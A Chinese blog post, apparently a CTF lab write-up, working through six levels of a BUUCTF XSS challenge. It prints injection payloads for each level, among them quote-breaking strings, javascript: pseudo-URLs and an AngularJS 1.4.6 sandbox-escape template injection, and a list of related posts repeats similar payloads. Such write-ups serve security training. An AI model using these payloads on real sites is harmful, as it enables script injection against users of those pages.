[第二章 web进阶]XSS闯关

最新推荐文章于 2023-11-01 20:48:31 发布
最新推荐文章于 2023-11-01 20:48:31 发布
阅读量1.9k 收藏 6
点赞数 5
分类专栏: web做题记录
原文链接:https://blog.csdn.net/weixin_46703850/article/details/113992105?ops_request_misc=&request_id=&biz_id=102&utm_term=%5B%E7%AC%AC%E4%BA%8C%E7%AB%A0%20web%E8%BF%9B%E9%98%B6%5DXSS%E9%97%AF%E5%85%B3buuctf&utm_medium=distribute.pc_search_result.none-task-blog-2~
版权

level1

?username=<script>alert(1)</script>

在这里插入图片描述
level2

查看源码
在这里插入图片描述
我们可以看到username被escape函数编码了,基本上就很难绕过。因此我们从username本身想办法。可以这样构造:

?username=';alert(1);//

在这里插入图片描述
在这里插入图片描述
这样username就是这样:
var username = ‘’;alert(1);//’;
成功执行了alert(1)。

level3

输入上一关的payload
题目源码,这次过滤了单引号
在这里插入图片描述
-那我就输两个单引号,然后就成功了
在这里插入图片描述

?username='';alert(1);//

level4

在这里插入图片描述
在这里插入图片描述
伪链接
javascript:alert(1),浏览器会把javascript后面的那一段内容当做代码,直接在当前页面执行。
代码中接收jumpUrl作为跳转url,所以,

/level4?jumpUrl=javascript:alert(1)

等待10秒后即可完成破解

level5

在这里插入图片描述
限制1

if(getQueryVariable('autosubmit') !== false){
	......
}

解决限制1,给autosubm传个值
autosubmit=1

限制2

autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');

解决限制2,同样是传值,只不过是传我们的注入语句
完整payload

/level5?autosubmit=1&action=javascript:alert(1)

level6

输入{{3*3}}输出9

在这里插入图片描述
发现打印出了9,印证了是模板XSS。
我们看一下这个环境用的是哪个模板,发现是AngularJS:
在这里插入图片描述
首先参考下面这个网页:
AngularJS客户端模板注入(XSS)
看完后就是模板注入XSS有了了解,不过由于我们的Angular版本是1.4.6,存在沙箱,因此要去搜索这个版本的Angular的沙箱逃逸的方法:AngularJS Sandbox Bypasses
从中得知的逃逸的办法:

?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

在这里插入图片描述

_pain_
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关
weixin_46703850的博客
02-23 1404
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 704
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF[第二章 web进阶]XSS闯关
2301_78136321的博客
09-26 630
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5420
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
BUUCTF [第二章 web进阶]XSS闯关
m0_49025459的博客
04-12 1927
题目 第一关 这一关没有过滤直接修改url就行 ?username=<script>alert('xss')</script> 第二关 这一题样式没什么变化直接上源码 <html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套测试平台</title> <meta http-equiv="Content-Type"
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 608
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
web安全 XSS 防御与修复
最新发布
07-14
自动化测试
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6169
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
xss挑战闯关笔记(一)
Delity的博客
05-08 815
一、在线靶场 http://test.ctf8.com 二、开始闯关 level1:首先第一关是个图片,观察url链接,发现有传参,直接把test替换成payload:<script>alert(1)</script>成功弹出 level2:此题考查参数闭合,一个搜索框,输入1,查看源代码,发现,1在两个双引号之间,那么我们只需要闭合前面一个引号,后面正常输入payloa...
WEB进阶 XSS题目(1-6)
qq_41819426的博客
03-28 1010
第一关 (无过滤绕过) 第一关中,我们看到一个正常页面,通过对URL的解读我们可以发现我们传递的值为username 我们直接使用script标签尝试。 http://5166c8e9-70dc-4685-9af5-66d6dc3c5fef.node4.buuoj.cn:81/level1?username=<script>alert(1)</script> 很简单的就注入成功了。 第二关(符号过滤) 第二关传递值并没有变化,我们继续尝试使用第一关的语句,发现压根就没有回显。 .
渗透测试之---xss-labs闯关【1-14关】
qq_43168364的博客
04-18 2950
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯关之旅带来极大的帮助 第一关 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二关 [payload: ”>&......
xss-labs】闯关记录1~9
qq_43665434的博客
03-11 194
xss-labs】闯关记录1~9 【level2】 输入特殊符号+标识符 查看网页源代码: 发现8989出现了两处,一处是在h2标签中,<>已被html编码,而input标签中的value属性中也有一处输出,且没有编码。 于是构造payload:" ><script>alert(/qianxun/)</script> 成功弹窗! 总结:审计网页源码的时候一定要细心!细心!细心! 【level3】onfocus绕过编码 1、测试流程 如图所示,输出共有
Xss-labs闯关总结
未完成的歌~的博客
07-13 7647
文章目录前言:Level 1 无过滤机制查看后台源码:通关代码:Level 2 闭合标签查看后台源码:通关代码:Level 3 单引号闭合 + 添加事件查看后台源码:通关代码:Level 4 双引号闭合 + 添加事件查看后台源码:通关代码:Level 5 新建标签查看后台源码:通关代码:Level 6 大小写绕过查看后台源码:通关代码:Level 7 双写绕过查看后台源码:通关代码:Level 8 编码绕过查看后台源码:通关代码:Level 9 检测关键字查看后台源码:通关代码:Level 10 隐藏信息查
[第二章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,禁止用户输入可执行的代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值